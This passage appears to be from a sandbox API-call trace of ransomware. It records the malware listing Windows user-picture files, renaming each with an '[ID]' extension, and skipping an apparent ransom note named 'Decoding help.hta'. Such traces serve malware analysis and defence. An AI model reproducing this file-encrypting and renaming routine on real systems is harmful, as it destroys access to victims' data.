Pictures\\usertile14.bmp" [0058.109] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" [0058.109] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.110] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdbb95fd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0058.110] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.110] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.110] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile15.bmp") returned -1 [0058.110] lstrlenW (lpString="usertile15.bmp") returned 14 [0058.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.110] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile15.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" [0058.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" [0058.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.110] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdca9c9ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0058.110] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.110] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.110] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.110] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.111] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile16.bmp") returned -1 [0058.111] lstrlenW (lpString="usertile16.bmp") returned 14 [0058.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.111] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile16.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" [0058.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" [0058.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.111] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc3f8f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0058.111] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.111] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.111] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.111] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile17.bmp") returned -1 [0058.111] lstrlenW (lpString="usertile17.bmp") returned 14 [0058.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.111] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile17.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" [0058.111] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" [0058.111] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.112] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc65a55, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0058.112] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.112] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.112] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.112] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile18.bmp") returned -1 [0058.112] lstrlenW (lpString="usertile18.bmp") returned 14 [0058.112] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.112] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.112] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile18.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" [0058.112] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" [0058.112] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.112] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.112] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae359dff, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae359dff, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc8bbb3, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0058.112] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.112] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.113] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile19.bmp") returned -1 [0058.113] lstrlenW (lpString="usertile19.bmp") returned 14 [0058.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.113] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile19.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" [0058.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" [0058.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.113] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae37ff5c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae37ff5c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdccb1d11, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0058.113] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.113] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.113] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.113] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile20.bmp") returned -1 [0058.113] lstrlenW (lpString="usertile20.bmp") returned 14 [0058.113] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.114] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile20.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" [0058.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" [0058.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0058.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.114] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x1791fd30 | out: lpFindFileData=0x1791fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae3a60b9, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae3a60b9, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd069f3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0058.114] lstrcpyW (in: lpString1=0x10d46aa0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.114] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 75 [0058.114] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0058.114] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x1 [0058.114] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile21.bmp") returned -1 [0058.114] lstrlenW (lpString="usertile21.bmp") returned 14 [0058.114] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0058.114] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 